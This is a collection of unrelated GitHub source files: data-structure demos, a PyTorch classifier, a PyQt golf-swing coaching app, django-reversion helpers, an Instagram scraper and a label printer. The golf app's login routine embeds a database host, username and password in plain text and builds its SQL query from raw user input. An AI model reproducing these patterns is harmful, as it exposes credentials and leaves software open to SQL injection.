            # Attach whichever list still has remaining (larger) nodes.
            if node1:
                if inode.elem < node1.elem:
                    inode.next = node1
            elif node2:
                if inode.elem < node2.elem:
                    inode.next = node2
            return sl
        elif yes1:
            return self
        elif yes2:
            return other
        else:
            # both lists empty
            return self
    ...  # stray placeholder left at class scope (harmless no-op)
import random
if __name__ == '__main__':
    # Demo 1: merge of possibly-unsorted random lists (merge may return None).
    l2 = MySList()
    for i in range(10):
        l2.append(random.randint(0, 20))
    print(l2)
    l3 = MySList()
    for i in range(10):
        l3.append(i)
    print('l2:', str(l2))
    print('l3:', str(l3))
    print("List merged:", str(l2.merge(l3)))
    print("List merged:", str(l3.merge(l2)))
    # Demo 2: build two sorted, duplicate-free random lists and merge them.
    data = []
    for i in range(5):
        x = random.randint(0, 10)
        if x not in data:
            data.append(x)
    data.sort()
    l2 = MySList()
    for x in data:
        l2.append(x)
    data = []
    for i in range(7):
        x = random.randint(0, 10)
        if x not in data:
            data.append(x)
    data.sort()
    l3 = MySList()
    for x in data:
        l3.append(x)
    print('l2:', str(l2))
    print('l3:', str(l3))
    print("List merged:", str(l2.merge(l3)))
    print("List merged:", str(l3.merge(l2)))
| J-H-C-037/Subject-EDA | EDA/partial1pastexamsEDA/partial_84.py | partial_84.py | py | 5,172 | python | en | code | 0 | github-code | 36 |
20145975874 | import torch.nn as nn
# define small classifier
class MlpClassifier(nn.Module):
    """Three-layer MLP head applied to flattened pretraining features.

    Args:
        args: config mapping with keys 'pretrain_output_size',
            'seq_length' and 'finetuning' (bool). When finetuning is
            False the incoming features are detached so no gradient
            flows back into the pretrained encoder.
        n_classes: number of output classes (logits dimension).
        pretrain_stage_config: accepted for interface compatibility;
            not used here.
    """

    def __init__(self, args, n_classes, pretrain_stage_config):
        super(MlpClassifier, self).__init__()
        # Flattened input: features per time step times sequence length.
        self.input_size = int(args['pretrain_output_size'] * args['seq_length'])
        self.hidden_dim1 = 512
        self.hidden_dim2 = 256
        self.freeze = not args['finetuning']
        self.fc1 = nn.Linear(in_features=self.input_size, out_features=self.hidden_dim1)
        self.fc2 = nn.Linear(in_features=self.hidden_dim1, out_features=self.hidden_dim2)
        self.fc3 = nn.Linear(in_features=self.hidden_dim2, out_features=n_classes)

    def forward(self, src):
        """Return class logits of shape (batch, n_classes).

        `src` is assumed to be (batch, seq_length, pretrain_output_size)
        or any shape flattening to (batch, input_size).
        """
        batch_size = src.size(0)
        if self.freeze:
            # detach() (instead of the legacy, autograd-unsafe .data)
            # blocks gradients into the pretrained encoder.
            features = src.detach()
        else:
            features = src
        flat = features.reshape(batch_size, -1)
        hidden = nn.functional.relu(self.fc1(flat))
        hidden = nn.functional.relu(self.fc2(hidden))
        return self.fc3(hidden)
| antonior92/physionet-12ecg-classification | models/mlp.py | mlp.py | py | 1,046 | python | en | code | 6 | github-code | 36 |
70887541225 | #!/usr/bin/env python
# coding: utf-8
# Leet Code problem: 19
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
    def removeNthFromEnd(self, head: 'Optional[ListNode]', n: int) -> 'Optional[ListNode]':
        """Remove the n-th node from the end of the list; return the head.

        Two-pointer, single pass, O(1) extra space (the original built a
        stack of every node only to use its length): advance ``fast`` n
        nodes ahead, then move both pointers until ``fast`` reaches the
        last node, so ``slow`` stops just before the node to delete.
        Annotations are string literals so this standalone file does not
        NameError on the LeetCode-provided Optional/ListNode names.
        Assumes 1 <= n <= length of the list (LeetCode constraint).
        """
        fast = head
        for _ in range(n):
            fast = fast.next
        if fast is None:
            # n equals the list length: the head itself is removed.
            return head.next
        slow = head
        while fast.next:
            fast = fast.next
            slow = slow.next
        slow.next = slow.next.next
        return head
# Slower but cleaner solution
# class Solution:
# def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:
# dummy=ListNode(-1,head)
# # pointers
# fast = head
# slow = dummy
# # Get fast to n
# for i in range(n-1):
# fast=fast.next
# # Move forward until fast reaches None
# while fast.next:
# fast=fast.next
# slow=slow.next
# # Remove the n (from last) node
# slow.next=slow.next.next
# return dummy.next | jwilliamn/trenirovka-code | leetc_19.py | leetc_19.py | py | 1,536 | python | en | code | 0 | github-code | 36 |
73933034022 | import sys
import datetime
import socket, time
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import *
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import QTimer, QTime
from PyQt5.QtCore import pyqtSignal, QObject
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5 import uic
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QByteArray, QSettings, QTimer, pyqtSlot
from PyQt5.QtWidgets import QWidget, QApplication, QLabel, QSizePolicy, QVBoxLayout, QAction, QPushButton, QLineEdit
from PyQt5.QtGui import QMovie
from time import sleep
import main as m
import Python_to_Linux as PtoL
import cv2
import threading
import serial
import numpy as np
import math
import statistics
import os
import sys
import pymysql
import base64
import requests
# Hardware is opened at import time: two cameras plus the Arduino serial
# link. NOTE(review): device indices (2 and 0) and the serial port are
# hard-coded; importing this module has side effects — confirm intended.
cam0 = cv2.VideoCapture(2)
cam1 = cv2.VideoCapture(0)
arduino = serial.Serial('/dev/ttyACM0', 115200)
print("camera on")
# Shared mutable state used across the worker threads below.
ar_flag = 0       # set to 1 once the Arduino reports 'Start'
Impact_frame=0    # Camera1 frame counter value at the moment of impact
cnt=0             # running frame counter while Camera1 records
id_text =""       # user id entered on the login screen
light_stop=False  # cooperative stop flag for the light-sensor thread
######################################## light thread
class lightThread(threading.Thread):
    """Thread that watches the Arduino serial line for an 'Impact' event."""

    def __init__(self, end, stop):
        super().__init__()
        self.end = end    # Communicate instance used to emit light_signal
        self.stop = stop  # zero-argument callable; True requests shutdown

    def __del__(self):
        print("del")

    def run(self):
        ligth(self.end, self.stop)
def ligth(end, stop):
    """Poll the Arduino until 'Impact' arrives, then emit light_signal.

    Exits early (without emitting) when stop() becomes true.
    Name kept as in the original ("ligth") — callers reference it.
    """
    while True:
        if stop():
            print("stop hihi")
            break
        reading = arduino.readline().decode()
        if reading == 'Impact\r\n':
            end.light_signal.emit()
            break
break
####################################### camera recording thread
class camThread(threading.Thread):
    """Thread that records one camera to disk via camPreview()."""

    success = 0  # camPreview() result: 1 = recorded OK, 5 = frame-grab error

    def __init__(self, previewName, camID, cam):
        super().__init__()
        self.previewName = previewName
        self.camID = camID
        self.cam = cam

    def run(self):
        self.success = camPreview(self.previewName, self.camID, self.cam)
def camPreview(previewName, camID, cam):
    """Record ~8 seconds of 640x480 MJPG video to examples/media/<name>.avi.

    Returns 1 on success, 5 if a frame grab fails. While recording from
    camera 0 the global `cnt` counts frames so impact_fram() can capture
    the frame index at the moment of impact.
    """
    global cnt
    cam.set(3,640)  # 3 = CAP_PROP_FRAME_WIDTH
    cam.set(4,480)  # 4 = CAP_PROP_FRAME_HEIGHT
    ##
    #frame_width=int(cam.get(3))
    #frame_height=int(cam.get(4))
    ##
    fps = 30
    out = cv2.VideoWriter('./examples/media/'+ str(previewName)+'.avi',cv2.VideoWriter_fourcc('M','J','P','G'), fps, (640,480))
    if camID==0:
        cnt = 0
    start_time = datetime.datetime.now()
    end_time = start_time + datetime.timedelta(seconds=8)
    while(True):
        # NOTE(review): cnt is incremented before cam.read(), so it counts
        # attempts, not successfully written frames — confirm intended.
        if camID==0:
            cnt+=1
        ret, frame = cam.read()
        if ret:
            out.write(frame)
            if end_time < datetime.datetime.now():
                out.release()
                print("recoding success "+str(previewName))
                return 1
        else:
            print("error "+str(previewName))
            return 5
def impact_fram(cnt):
    """Record the Camera1 frame counter value at the moment of impact."""
    global Impact_frame
    print(cnt)
    Impact_frame = cnt
####################################### cross-thread Qt signals
class Communicate(QObject):
    """Bundle of Qt signals used to hand events between threads and the GUI."""
    end_signal = pyqtSignal()     # swing playback finished (VideoPlayer re==3)
    cam_signal = pyqtSignal()     # Arduino sent 'Start' -> begin recording
    main_signal = pyqtSignal()    # analysis (main_run) finished
    light_signal = pyqtSignal()   # Arduino sent 'Impact'
    take_signal = pyqtSignal()    # playback reached the takeaway frame
    top_signal = pyqtSignal()     # playback reached the top-of-swing frame
    impact_signal = pyqtSignal()  # playback reached the impact frame
    youngseon = pyqtSignal()      # request to stop the light-sensor watcher
####################################### video playback thread
class Video(threading.Thread):
    """Thread that plays a video file into a Qt label via VideoPlayer()."""

    def __init__(self, ui, previewName, labelName, width, height, re, stop, end):
        super().__init__()
        self.ui = ui
        self.previewName = previewName  # path of the video file to play
        self.labelName = labelName      # QLabel the frames are painted onto
        self.width = width
        self.height = height
        self.re = re                    # playback mode flag (see VideoPlayer)
        self.stop = stop                # zero-argument stop predicate
        self.end = end                  # Communicate instance for signals

    def run(self):
        VideoPlayer(self.ui, self.previewName, self.labelName, self.width,
                    self.height, self.re, self.stop, self.end)
def VideoPlayer(ui, previewName, label, width, height, re, stop, end):
    """Paint frames of `previewName` onto `label` until stop() or mode ends.

    Mode flag `re`:
      0 - play the intro clip until the Arduino reports 'Start' (ar_flag).
      1 - loop the clip until stop() becomes true.
      3 - wait for the Arduino 'Start', emit cam_signal, play the swing
          clip once, then emit end_signal.
      9 - loop while counting frames and emitting take/top/impact signals
          at frame indices derived from m.point (analysis results).
    """
    marker_cnt=0
    global ar_flag
    while True:
        cap = cv2.VideoCapture(previewName)
        if stop():
            break
        if re ==3 :
            # Block until the Arduino announces the swing has started.
            while ar_flag == 0 :
                a=arduino.readline()
                a=a.decode()
                if a == 'Start\r\n':
                    ar_flag = 1
                    end.cam_signal.emit()
        while True:
            if re == 0:
                # Intro loop: bail out as soon as the swing starts.
                if ar_flag == 1:
                    break
                else:
                    pass
            elif re == 9:
                marker_cnt +=1
            label.ret, label.frame = cap.read()
            if label.ret:
                # Convert BGR -> RGB, wrap as QImage/QPixmap, scale to fit.
                label.rgbImage = cv2.cvtColor(label.frame, cv2.COLOR_BGR2RGB)
                label.convertToQtFormat = QImage(label.rgbImage.data, label.rgbImage.shape[1],
                                                 label.rgbImage.shape[0], QImage.Format_RGB888)
                label.pixmap = QPixmap(label.convertToQtFormat)
                label.p = label.pixmap.scaled(width, height, QtCore.Qt.IgnoreAspectRatio)
                label.setPixmap(label.p)
                label.update()
                if re == 9:
                    if marker_cnt == math.floor(m.point[1]*3): # takeaway point
                        end.take_signal.emit()
                    elif marker_cnt == math.floor(m.point[3]*3): # top point
                        end.top_signal.emit()
                    elif marker_cnt == math.floor(m.point[4]*3): # impact point
                        end.impact_signal.emit()
                # ~25 ms inter-frame delay via a nested Qt event loop.
                loop = QtCore.QEventLoop()
                QtCore.QTimer.singleShot(25, loop.quit)
                loop.exec_()
            else:
                # End of file: restart (looping modes) or fall through.
                break
            if stop():
                break
        cap.release()
        if re == 0 or re == 3:
            break
        else:
            pass
    if re == 3:
        end.end_signal.emit()
def camera(end):
    """Start both camera recorders and the Arduino impact watcher.

    Waits ~3 s (via a nested Qt event loop) before starting the threads,
    then returns the lightThread instance.
    """
    global light_stop
    light_stop=False
    cam_t1 = camThread("Camera1", 0, cam0)
    cam_t2 = camThread("Camera2", 1, cam1)
    light = lightThread(end, lambda: light_stop)
    loop = QtCore.QEventLoop()
    QtCore.QTimer.singleShot(3000, loop.quit)
    loop.exec_()
    cam_t1.start()
    cam_t2.start()
    light.start()
    return light
def young(light):
    # NOTE(review): in GUI_all `light` is the return value of a Qt
    # signal connect() call, not a thread object, and threading.Thread
    # has no quit() method — confirm what this is meant to stop.
    light.quit()
########################################## feedback (analysis) thread
class MainThread(threading.Thread):
    """Background worker that runs the swing-analysis pipeline (main_run)."""

    success = 0

    def __init__(self, end):
        super().__init__()
        self.end = end  # Communicate instance; main_signal emitted when done

    def run(self):
        main_run(self.end)
def main_run(end):
    """Run the analysis pipeline, then signal the GUI via main_signal."""
    global id_text
    global Impact_frame
    PtoL.JSONmaker()
    m.main(Impact_frame, id_text)
    end.main_signal.emit()
########################################### main GUI
# Loading-spinner animation shown on the processing screen.
gifFile = "loading.gif"
class MyWindow_step(QMainWindow):
def __init__(self, gifFile):
super().__init__()
self.gifFile = gifFile
self.GUI_login()
#self.GUI_all()
def GUI_login(self):
self.ui = uic.loadUi('Designer_login.ui')
self.ui.show()
self.ui.LoginButton.clicked.connect(lambda : self.LoginDB(self.ui))
def LoginDB(self,a):
global id_text
id_text = a.UserID.text()
try:
#send db -> response 200
conn = pymysql.connect("db-ladybug.cmghyay3tpvl.ap-northeast-2.rds.amazonaws.com",user="ladybug",passwd = "ladybug456123",db="AppService", port=3306,use_unicode=True,charset ='utf8')
cursor = conn.cursor()
query = """SELECT * FROM AppService.MEMBER WHERE user_id = '{0}';""".format(id_text)
cursor.execute(query)
result = cursor.fetchall()
conn.commit()
asdf=()
if result == asdf:
a.UserID.setText("Please Sign up in application")
else:
self.GUI_all()
except:
#respose 404
print("server not connect")
intro_stop = False
swing_stop = False
def GUI_all(self):
self.ui = uic.loadUi('Designer_all.ui')
#print("all"+str(threading.active_count()))
self.ui.loadinglabel_2.hide()
global ar_flag
global intro_stop
global swing_stop
global cnt
global light_stop
light_stop=False
ar_flag = 0
self.end = Communicate()
intro_stop = False
swing_stop = False
intro_thread = Video(self.ui,"golf_animation_intro.avi", self.ui.video_label, 1920, 1080, 0, lambda: intro_stop, self.end)
swing_thread = Video(self.ui,"golf_animation_swing.avi", self.ui.video_label, 1920, 1080, 3, lambda: swing_stop, self.end)
intro_thread.daemon = True
swing_thread.daemon = True
intro_thread.start()
swing_thread.start()
self.ui.show()
light = self.end.cam_signal.connect(lambda: camera(self.end))
self.end.light_signal.connect(lambda: impact_fram(cnt))
self.end.end_signal.connect(self.GUI_loading)
self.end.youngseon.connect(lambda: young(light))
def GUI_loading(self):
self.ui.loadinglabel_2.show()
print("loding" + str(threading.active_count()))
self.end = Communicate()
self.movie = QMovie(self.gifFile, QByteArray(), self)
self.movie.setCacheMode(QMovie.CacheAll)
self.ui.loadinglabel.setMovie(self.movie)
self.movie.start()
self.movie.loopCount()
global Impact_frame
if Impact_frame==0:
self.GUI_fakeswing(self.end)
return
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(3000, loop.quit)
loop.exec_()
main_Thread = MainThread(self.end)
main_Thread.daemon = True
main_Thread.start()
self.end.main_signal.connect(self.GUI_feedback)
def GUI_fakeswing(self,end):
end.youngseon.emit()
print(threading.active_count())
global intro_stop
global swing_stop
global light_stop
light_stop=True
print(threading.active_count())
intro_stop=True
print(threading.active_count())
swing_stop=True
print(threading.active_count())
self.ui = uic.loadUi('Designer_fakeswing.ui')
self.ui.show()
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(3000, loop.quit)
loop.exec_()
self.GUI_all()
marker_stop=False
def GUI_feedback(self):
self.ui = uic.loadUi('Designer_feedback.ui')
self.end = Communicate()
self.ui.show()
self.ui.home.clicked.connect(lambda: self.feedback_clicked(1))
self.ui.replay.clicked.connect(lambda: self.feedback_clicked(2))
self.ui.feedback1.clicked.connect(lambda: self.feedback_clicked(3))
self.ui.feedback2.clicked.connect(lambda: self.feedback_clicked(4))
self.ui.feedback3.clicked.connect(lambda: self.feedback_clicked(5))
def GUI_feedback1(self):
self.ui = uic.loadUi('Designer_feedback1.ui')
self.end = Communicate()
global marker_stop
global intro_stop
global swing_stop
intro_stop = True
swing_stop = True
marker_stop=False
front_thread = Video(self.ui,"Camera1_out.avi", self.ui.front_label, 830, 700, 9, lambda: marker_stop, self.end)
side_thread = Video(self.ui,"Camera2_out.avi", self.ui.side_label, 830, 700, 1, lambda: marker_stop, self.end)
front_thread.daemon=True
side_thread.daemon=True
front_thread.start()
side_thread.start()
self.ui.show()
self.textbox(self.ui.textBrowser,1)
self.end.take_signal.connect(lambda: self.textbox(self.ui.textBrowser,2))
self.end.top_signal.connect(lambda: self.textbox(self.ui.textBrowser,3))
self.end.impact_signal.connect(lambda: self.textbox(self.ui.textBrowser,4))
self.end.impact_signal.connect(lambda: self.textbox(self.ui.textBrowser,0))
self.ui.skip_button.clicked.connect(self.feedback_clicked1)
feedback_stop = False
def GUI_feedback2(self):
self.ui = uic.loadUi('Designer_feedback2.ui')
self.end = Communicate()
global feedback_stop
feedback_stop = False
address_thread = Video(self.ui,"testing1.avi", self.ui.video1, 425, 530, 1, lambda: feedback_stop, self.end)
backswing_thread = Video(self.ui,"testing2.avi", self.ui.video2, 425, 530, 1, lambda: feedback_stop, self.end)
swing_thread = Video(self.ui,"testing3.avi", self.ui.video3, 425, 530, 1, lambda: feedback_stop, self.end)
finish_thread = Video(self.ui,"testing4.avi", self.ui.video4, 425, 530, 1, lambda: feedback_stop, self.end)
address_thread.daemon=True
backswing_thread.daemon=True
swing_thread.daemon=True
finish_thread.daemon=True
address_thread.start()
backswing_thread.start()
swing_thread.start()
finish_thread.start()
self.ui.show()
self.textbox(self.ui.text1,1)
self.textbox(self.ui.text2,2)
self.textbox(self.ui.text3,3)
self.textbox(self.ui.text4,4)
self.ui.backButton.clicked.connect(self.feedback_clicked2)
def GUI_feedback3(self):
self.ui = uic.loadUi('Designer_feedback3.ui')
self.end = Communicate()
global feedback_stop
feedback_stop = False
address_thread = Video(self.ui,"master_out.avi", self.ui.video1, 911, 471, 1, lambda: feedback_stop, self.end)
backswing_thread = Video(self.ui,"pelvis_out.avi", self.ui.video2, 911, 471, 1, lambda: feedback_stop, self.end)
swing_thread = Video(self.ui,"Camera1_master_out.avi", self.ui.video3, 911, 471, 1, lambda: feedback_stop, self.end)
finish_thread = Video(self.ui,"Camera1_pelvis_out.avi", self.ui.video4, 911, 471, 1, lambda: feedback_stop, self.end)
address_thread.daemon=True
backswing_thread.daemon=True
swing_thread.daemon=True
finish_thread.daemon=True
address_thread.start()
backswing_thread.start()
swing_thread.start()
finish_thread.start()
self.ui.show()
self.ui.backButton.clicked.connect(self.feedback_clicked3)
def textbox(self, textBox, text):
if text ==0:
for i, val in enumerate(m.stands):
textBox.append(val)
textBox.show()
elif text ==1:
for i, val in enumerate(m.address_feedback):
textBox.append(val)
textBox.show()
elif text ==2:
for i, val in enumerate(m.backswing_feedback):
textBox.append(val)
textBox.show()
elif text ==3:
for i, val in enumerate(m.swing_feedback):
textBox.append(val)
textBox.show()
elif text ==4:
for i, val in enumerate(m.finish_feedback):
textBox.append(val)
textBox.show()
def feedback_clicked(self,button):
global feedback_stop
feedback_stop = True
self.ui.close()
if button ==1:
self.GUI_login()
elif button ==2:
self.GUI_all()
elif button ==3:
self.GUI_feedback1()
elif button ==4:
self.GUI_feedback2()
elif button ==5:
self.GUI_feedback3()
def feedback_clicked1(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
def feedback_clicked2(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
def feedback_clicked3(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
if __name__ == "__main__":
    # Start the Qt application and open the login window.
    app = QApplication(sys.argv)
    myApp_step = MyWindow_step(gifFile)
    app.exec_()
| 0sun-creater/golf_swing_coaching_program | python/GUI.py | GUI.py | py | 17,024 | python | en | code | 0 | github-code | 36 |
74218356582 | from PySide6.QtCore import QObject, Property, Slot, Signal, QTimer
from typing import Optional
from .qml_file_wrapper import QmlFileWrapper
class MainController(QObject):
main_content_qml_changed = Signal()
def __init__(self, parent=None):
super().__init__(parent)
self._app = parent
self._qml_wrappers = {
"HOME": QmlFileWrapper('Home.qml'),
"OTHER": QmlFileWrapper('Other.qml')
}
self._active_id = "HOME"
self._active_wrapper: QmlFileWrapper = self._qml_wrappers[self._active_id]
self._counter = 0
self._timer = QTimer()
self._timer.setInterval(10)
self._timer.setSingleShot(False)
self._timer.timeout.connect(self._toggle_screen)
@Property(str, notify=main_content_qml_changed)
def main_content_qml(self) -> str:
return self._active_wrapper.qml_path
def startup(self):
self._timer.start()
def shutdown(self):
print(f"Stopping after {self._counter} iterations.")
@Slot(str, result=QmlFileWrapper)
def get_wrapper_object_by_name(self, screen_name: str) -> Optional[QmlFileWrapper]:
return self._qml_wrappers[screen_name.upper()]
@Slot(str) # QML will only send a string
def go_to_qml_by_name(self, next_id: str) -> None:
self._active_wrapper = self.get_wrapper_object_by_name(next_id)
self.main_content_qml_changed.emit()
def _toggle_screen(self):
self._counter = self._counter + 1
if self._active_id == "HOME":
self._active_id = "OTHER"
else:
self._active_id = "HOME"
self.go_to_qml_by_name(self._active_id)
| maldata/qml-error-test | errortest/main_controller.py | main_controller.py | py | 1,733 | python | en | code | 0 | github-code | 36 |
18879607170 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
Support for django-reversion on models with translatable fields and django-cms
placeholder fields.
"""
from functools import partial
from django.db.models.signals import post_save
from cms.models.pluginmodel import CMSPlugin
from reversion.revisions import (
default_revision_manager, revision_context_manager, VersionAdapter)
# We would like this to not depend on Parler, but still support if it is
# available.
try:
from parler import cache
except:
pass
def _add_to_context(obj, manager=None, context=None):
if manager is None:
manager = default_revision_manager
if context is None:
context = default_revision_manager._revision_context_manager
adapter = manager.get_adapter(obj.__class__)
version_data = adapter.get_version_data(obj)
context.add_to_context(manager, obj, version_data)
def create_revision(obj, user=None, comment=None):
with revision_context_manager.create_revision():
if user:
revision_context_manager.set_user(user)
if comment:
revision_context_manager.set_comment(comment)
_add_to_context(obj)
if hasattr(obj._meta, 'placeholder_field_names'):
add_placeholders_to_revision(instance=obj)
def add_placeholders_to_revision(
instance, revision_manager=None, rev_ctx=None):
"""
Manually add plugins to the revision.
This function is an updated version of
http://github.com/divio/django-cms/blob/develop/cms/utils/helpers.py#L34
but instead of working on pages, works on models with placeholder
fields.
"""
add_to_context = partial(
_add_to_context,
manager=revision_manager,
context=rev_ctx,
)
# Add the placeholder to the revision
for name in instance._meta.placeholder_field_names:
add_to_context(getattr(instance, name))
# Add all plugins to the revision
ph_ids = [getattr(instance, '{0}_id'.format(name))
for name in instance._meta.placeholder_field_names]
for plugin in CMSPlugin.objects.filter(placeholder_id__in=ph_ids):
plugin_instance, _ = plugin.get_plugin_instance()
if plugin_instance:
add_to_context(plugin_instance)
add_to_context(plugin)
class TranslatableVersionAdapterMixin(object):
    """VersionAdapter mixin that also tracks django-parler translations."""
    # Must be set (by a subclass or registration code) to the revision
    # manager the translation model is registered with.
    revision_manager = None
    def __init__(self, model):
        super(TranslatableVersionAdapterMixin, self).__init__(model)
        # If the model is translated with django-parler, register the
        # translation model to be tracked as well, by following all placeholder
        # fields, if any.
        if hasattr(model, '_parler_meta'):
            root_model = model._parler_meta.root_model
            self.revision_manager.register(root_model)
            # Also add the translations to the models to follow.
            self.follow = list(self.follow) + [model._parler_meta.root_rel_name]
            # And make sure that when we revert them, we update the translations
            # cache (this is normally done in the translation `save_base`
            # method, but it is not called when reverting changes).
            post_save.connect(self._update_cache, sender=root_model)
    def _update_cache(self, sender, instance, raw, **kwargs):
        """Update the translations cache when restoring from a revision."""
        if raw:
            # Raw is set to true (only) when restoring from fixtures or,
            # django-reversion
            cache._cache_translation(instance)
class PlaceholderVersionAdapterMixin(object):
    """VersionAdapter mixin that follows django-cms placeholder fields."""
    # Set to False in a subclass to skip following placeholder fields.
    follow_placeholders = True
    def __init__(self, model):
        super(PlaceholderVersionAdapterMixin, self).__init__(model)
        # Add cms placeholders to the models to follow.
        placeholders = getattr(model._meta, 'placeholder_field_names', None)
        if self.follow_placeholders and placeholders:
            self.follow = list(self.follow) + placeholders
            post_save.connect(self._add_plugins_to_revision, sender=model)
    def _add_plugins_to_revision(self, sender, instance, **kwargs):
        """post_save hook: record the instance's plugins in the active revision."""
        rev_ctx = self.revision_manager._revision_context_manager
        if rev_ctx.is_active() and not rev_ctx.is_managing_manually():
            add_placeholders_to_revision(
                instance=instance,
                revision_manager=self.revision_manager,
                rev_ctx=rev_ctx,
            )
class ContentEnabledVersionAdapter(TranslatableVersionAdapterMixin,
                                   PlaceholderVersionAdapterMixin,
                                   VersionAdapter):
    """Adapter following both parler translations and CMS placeholders."""
    pass
# Shortcut for registering a model with full content-versioning support.
version_controlled_content = partial(default_revision_manager.register,
                                     adapter_cls=ContentEnabledVersionAdapter,
                                     revision_manager=default_revision_manager)
| aldryn/aldryn-reversion | aldryn_reversion/core.py | core.py | py | 4,835 | python | en | code | 1 | github-code | 36 |
6217952013 | """
Runs that functionality of the program, the flask app and the server that communicates with Walabot.
"""
from threading import Thread
from meeting_room import app
from FreeRoomsServer import FreeRoomsServer
from config import HOST, PORT
def main():
    """
    Start the Walabot room server and the Alexa flask app, then wait on both.
    """
    try:
        rooms_server = FreeRoomsServer(HOST, PORT)
        # Same order as before: Walabot server thread first, then flask.
        threads = [
            Thread(target=rooms_server.start),
            Thread(target=app.run),
        ]
        for worker in threads:
            worker.start()
        for worker in threads:
            worker.join()
    except Exception:
        print("Unknown exception occurred!")
        raise
if __name__ == '__main__':
main()
| Walabot-Projects/Walabot-MeetingRoom | server/main.py | main.py | py | 817 | python | en | code | 1 | github-code | 36 |
70862843305 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 15 14:41:09 2022
@author: bas
"""
#https://instaloader.github.io/as-module.html
import instaloader
from datetime import datetime
from login import getMyUsername
import random
import pandas
def login(L, username, filename='login_session'):
    """Load a saved instaloader session into *L* unless already logged in.

    NOTE(review): assumes `L.test_login()` returns the logged-in username
    (a str) or a non-str when logged out -- confirm against instaloader docs.
    """
    if not isinstance(L.test_login(),str):
        L.load_session_from_file(username, filename=filename)
    return L
def get_posts(L, myUsername, targetUsername, datetimeEarliest, datetimeLatest):
    """Return *targetUsername*'s posts dated strictly inside the given window.

    Logs in as *myUsername* first; bounds are exclusive on `post.date_utc`.
    """
    L=login(L, myUsername)
    profile = instaloader.Profile.from_username(L.context, targetUsername)
    print('getting all posts...')
    # Materializes the whole feed before filtering; slow for large accounts.
    posts = [post for post in profile.get_posts()]
    print('selecting posts...')
    posts_interval = [post for post in posts if (post.date_utc>datetimeEarliest and post.date_utc<datetimeLatest)]
    return posts_interval
# `locals()` guards let this script be re-run in an interactive session
# (e.g. Spyder) without recreating the session or re-downloading posts.
if not 'L' in locals():
    L = instaloader.Instaloader()
if not 'posts' in locals():
    username = 'nyenrodebu'
    myUsername = getMyUsername()
    date_earliest = datetime(2020, 1, 1)
    date_latest = datetime(2022, 1, 1)
    posts = get_posts(L, myUsername, username, date_earliest, date_latest)
# Randomly sample a fixed number of posts and collect metadata per post.
n = 78
posts_sampled = random.sample(posts, n)
posts_dict = {}
n_post = 0
for post in posts_sampled:
    n_post += 1
    print(f'post {n_post}/{n}')
    post_dict = {}
    post_dict['is_video'] = post.is_video
    post_dict['likes'] = post.likes
    post_dict['video_duration'] = post.video_duration
    post_dict['video_view_count'] = post.video_view_count
    post_dict['title'] = post.title
    post_dict['url'] = f'https://www.instagram.com/p/{post.shortcode}/'
    post_dict['mediacount'] = post.mediacount
    post_dict['caption'] = post.caption
    post_dict['date_utc'] = post.date_utc
    post_dict['comments'] = post.comments
    posts_dict[post.mediaid] = post_dict
# One CSV row per post, indexed by the media id.
df = pandas.DataFrame.from_dict(posts_dict, orient='index')
df.to_csv(f'output_files/username={username}_posts={n}.csv')
| Basdorsman/instagram-analysis | collect_data.py | collect_data.py | py | 1,976 | python | en | code | 0 | github-code | 36 |
9710241755 | import subprocess
from datetime import datetime
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from local import my_printer, printer_list
# Ce programme imprime de petites étiquettes pour des tubes de type Eppendorf 1.5 ml
# L'utilisateur dispose de 4 champs.
# L'utilisateur peut décider d'imprimer la date d'impression ou un cinquième champ.
# Fonction pour imprimer les étiquettes
def print_labels():
    """Build the IPL label payload from the form fields and send it to the
    selected printer by copying the spooled file (Windows `copy`)."""
    field_1 = entry_field_1.get()
    field_2 = entry_field_2.get()
    field_3 = entry_field_3.get()
    field_4 = entry_field_4.get()
    nb_labels = int(entry_nb_labels.get()) # number of labels to print
    # Fifth line is either today's timestamp or the free-text field.
    if add_date_var.get():
        now = datetime.now().strftime("%Y/%m/%d %H:%M")
    else:
        now = alt_field_for_date.get()
    ipl_format_for_Epp_1_5_ml = f"""
<STX><ESC>C<ETX><STX><ESC>P<ETX><STX>E5;F5;<ETX>
<STX>H01;o315,565;b0;f2;h01;w01;c34;d3,{field_1};<ETX>
<STX>H02;o55,565;b1;f2;h01;w01;c31;d3,{field_2};<ETX>
<STX>H04;o315,520;b0;f2;h01;w01;c34;d3,{field_3};<ETX>
<STX>H05;o315,455;b0;f2;h02;w01;c2;d3,{field_4};<ETX>
<STX>H06;o315,415;b0;f2;h01;w01;c30;d3,{now};<ETX>
/* ligne */
<STX>L07;o315,380;f2;l1300;w4<ETX>
# <STX>B10;o125,115;c2;f3;h160;w03;i0;d3," + ";<ETX>
/* afficher ALIQUOT BIO MOL */
<STX>H14;o315,300;b1;f2;h01;w01;c31;d3,BIOMOL;<ETX>
/* Mini étiquette pour couvercle */
<STX>H16;o315,100;b0;f2;h01;w01;c31;d3,{field_1};<ETX>
<STX>H17;o315,65;b0;f2;h01;w01;c31;d3,{field_3};<ETX>
<STX>R<ETX><STX><ESC>E5<CAN><ETX><STX><RS>{nb_labels}<ETB><ETX>
"""
    with open("etiq.txt", 'w') as f:
        f.writelines(ipl_format_for_Epp_1_5_ml)
    try:
        # NOTE(review): ".\etiq.txt" only works because "\e" is not a Python
        # escape sequence; a raw string (r".\etiq.txt") would be safer.
        subprocess.check_output(["copy", ".\etiq.txt", selected_printer.get()], shell=True)
        messagebox.showinfo("Impression réussie", "Les étiquettes ont été imprimées avec succès.")
    except Exception as e:
        messagebox.showerror("Erreur d'impression", f"Une erreur est survenue lors de l'impression : {str(e)}")
# Fonction pour activer ou désactiver le champ field_5 en fonction de la case à cocher
